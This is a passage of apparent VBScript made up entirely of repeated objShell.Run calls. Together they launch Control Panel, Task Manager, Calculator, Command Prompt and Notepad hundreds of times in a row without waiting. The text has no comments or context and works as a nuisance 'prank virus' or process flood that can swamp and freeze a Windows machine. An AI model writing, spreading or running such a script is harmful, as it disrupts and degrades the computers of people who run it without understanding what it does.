
objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

